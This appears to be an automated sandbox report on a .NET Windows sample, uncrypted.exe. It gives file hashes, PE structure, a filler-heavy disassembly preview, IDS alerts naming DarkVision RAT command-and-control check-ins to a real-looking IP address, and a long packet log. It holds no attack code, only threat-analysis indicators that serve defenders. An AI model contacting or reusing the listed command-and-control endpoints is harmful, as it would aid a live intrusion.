                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        01:33:00API Interceptor1x Sleep call for process: uncrypted.exe modified
                        01:33:02API Interceptor6x Sleep call for process: explorer.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        VODAFONE-IT-ASNITkwari.mips.elfGet hashmaliciousUnknownBrowse
                        • 93.150.243.45
                        botx.mips.elfGet hashmaliciousMiraiBrowse
                        • 37.178.147.159
                        botx.x86.elfGet hashmaliciousMiraiBrowse
                        • 109.119.42.246
                        star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                        • 5.89.85.231
                        mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                        • 5.95.28.147
                        db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                        • 37.118.210.45
                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                        • 188.217.53.181
                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                        • 93.147.74.169
                        nabarm7.elfGet hashmaliciousUnknownBrowse
                        • 91.80.70.20
                        splarm5.elfGet hashmaliciousUnknownBrowse
                        • 5.90.45.75

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uncrypted.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\uncrypted.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1299
                        Entropy (8bit):5.342376182732888
                        Encrypted:false
                        SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4xLE4qE4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0H6
                        MD5:15A85EF9F3C51B739D8B32F5D653907F
                        SHA1:4B0589739321E819A9D7B2C922D2C7C333C3DC41
                        SHA-256:C4ECDB3A724CE069DB7B3473D4690DCB37E74B76A957C64F3D9B5B07655AE544
                        SHA-512:E102D29E8B0DE5E0653C42F94FFAFCBEE4100668D8A0AB2A5C845DDC0759E68D86F044887932A93C1AA2520C877CA48DAFE2559A3A592B88DCDAAFE5AEE6C2BC
                        Malicious:true
                        Reputation:low
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Temp\DATABASE

                        Download File
                        Process:C:\Windows\explorer.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):51200
                        Entropy (8bit):0.8746135976761988
                        Encrypted:false
                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.5752388995368864
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:uncrypted.exe
                        File size:1'028'096 bytes
                        MD5:84e8a17e39ef16dce73da924ced012d5
                        SHA1:630f2eb6046e05450c10af2a4ae01840e0a19405
                        SHA256:bebe3cadd1d51412d055ba11ebc64091c45e2ef47dbcc7135d2d762f26a466c2
                        SHA512:637d28f7ecc48a606813301143c440f27a0de999284cad0df6467533a7440ac56cd343b7d99103f3d8bcddf952bfa4794003d8740a7b21090443aafa5fddf24c
                        SSDEEP:24576:81sPbvgcpRe4WuI4i2RlQCeUAO9UKEiLzoOZuC:81sPbvgcpRquIJ2XQz09UMLQ
                        TLSH:B425233BB31067A6C79983FE5042FA5426C889808F4BBF65C55C62610F7AFA65F0F463
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....meg................................. ........@.. ..............................9 ....@................................

                        File Icon

                        Icon Hash:21059d3565d95f70

                        Static PE Info

                        General

                        Entrypoint:0x4f11ee
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x67656DDC [Fri Dec 20 13:15:08 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xf11a00x4b.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x1800.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x2048.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xef1f40xef20071d1d2af03d1df3f866fc5e02edc6873False0.9048104253789859data7.563976267050098IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xf20000x18000x1800296b3e1a60010510377ece4cf24e4502False0.5572916666666666data5.686165936068512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xf40000xc0x200f02121ed18c5741fce985a42fb9e3a8aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        DeaJ6sQm0xf60000x9f280xa00089d5ab462d6854a0bd9451945e39f511False0.8961181640625data7.6120194254237985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xf24f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.6057692307692307
                        RT_GROUP_ICON0xf35a00x14data1.2
                        RT_VERSION0xf21300x3c4data0.39522821576763484
                        RT_MANIFEST0xf35b80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-12-31T07:33:04.802221+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5497065.89.185.1568900TCP
                        2024-12-31T07:33:13.838339+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5497075.89.185.1568900TCP
                        2024-12-31T07:33:22.853752+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5497205.89.185.1568900TCP
                        2024-12-31T07:33:31.892912+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5497815.89.185.1568900TCP
                        2024-12-31T07:33:40.927898+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5498375.89.185.1568900TCP
                        2024-12-31T07:33:49.983774+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5498985.89.185.1568900TCP
                        2024-12-31T07:33:58.994424+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499605.89.185.1568900TCP
                        2024-12-31T07:34:08.143325+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499855.89.185.1568900TCP
                        2024-12-31T07:34:17.166204+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499865.89.185.1568900TCP
                        2024-12-31T07:34:26.197336+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499875.89.185.1568900TCP
                        2024-12-31T07:34:35.228839+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499885.89.185.1568900TCP
                        2024-12-31T07:34:44.244638+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499895.89.185.1568900TCP
                        2024-12-31T07:34:53.025515+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499905.89.185.1568900TCP
                        2024-12-31T07:35:01.478246+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.5499915.89.185.1568900TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 31, 2024 07:33:01.799813032 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:01.804603100 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:01.804697037 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:01.804835081 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:01.809578896 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471774101 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471791029 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471852064 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.471858025 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471869946 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471880913 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471914053 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.471951962 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471963882 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471973896 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.471985102 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.472003937 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.472043037 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.473469019 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.473534107 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.476655960 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.476687908 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.476699114 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.476708889 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.476735115 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.476788044 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.581559896 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581595898 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581607103 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581618071 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581629038 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581640005 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581753969 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.581803083 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.581948996 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.581959009 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.582001925 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.583416939 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583427906 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583437920 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583479881 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.583539963 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583614111 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583623886 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583633900 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583646059 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.583666086 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.583702087 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.585524082 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.585551023 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.585562944 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.585573912 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.585588932 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.585598946 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.585599899 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.585649014 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.585972071 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.587506056 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.587518930 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.587528944 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.587564945 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.587611914 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.691648006 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691737890 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691756964 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691776037 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691787004 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691797972 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691807985 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.691806078 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.691857100 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.693455935 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693499088 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693510056 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.693629980 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693640947 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693650007 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693660021 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693675995 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693675995 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.693686008 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693696976 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693706036 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.693708897 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.693727016 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.693744898 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.695493937 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695504904 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695514917 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695533037 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695549965 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.695580006 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.695585012 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695650101 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695678949 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695689917 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.695696115 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.695723057 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.696022987 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696034908 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696046114 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696055889 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696064949 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696074009 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.696100950 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.696429014 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696439981 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696449995 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696476936 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.696755886 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696795940 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696798086 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.696805954 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696815968 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.696840048 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.697071075 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697112083 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.697118044 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697134972 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697145939 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697161913 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697170019 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.697196007 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.697660923 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697671890 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697681904 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697710991 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.697880983 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697890997 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697901011 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.697930098 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.697958946 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.698163033 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698173046 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698237896 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.698319912 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698331118 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698339939 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698390007 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.698551893 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698561907 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698573112 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698581934 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.698602915 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.698626995 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.778223038 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801188946 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801203966 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801215887 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801246881 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.801280022 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801281929 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.801297903 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801317930 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801328897 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801338911 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.801342010 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.801357985 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.803076029 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803098917 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803107977 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803113937 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803123951 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.803154945 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.803376913 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803416967 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803432941 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803442955 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803453922 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803458929 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.803484917 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.803484917 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.803484917 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.805172920 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805183887 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805218935 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805227995 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805233955 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.805269003 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.805433989 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805459023 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805469990 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805480957 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805493116 CET8181497045.89.185.156192.168.2.5
                        Dec 31, 2024 07:33:02.805524111 CET497048181192.168.2.55.89.185.156
                        Dec 31, 2024 07:33:02.805524111 CET8181497045.89.185.156192.168.2.5
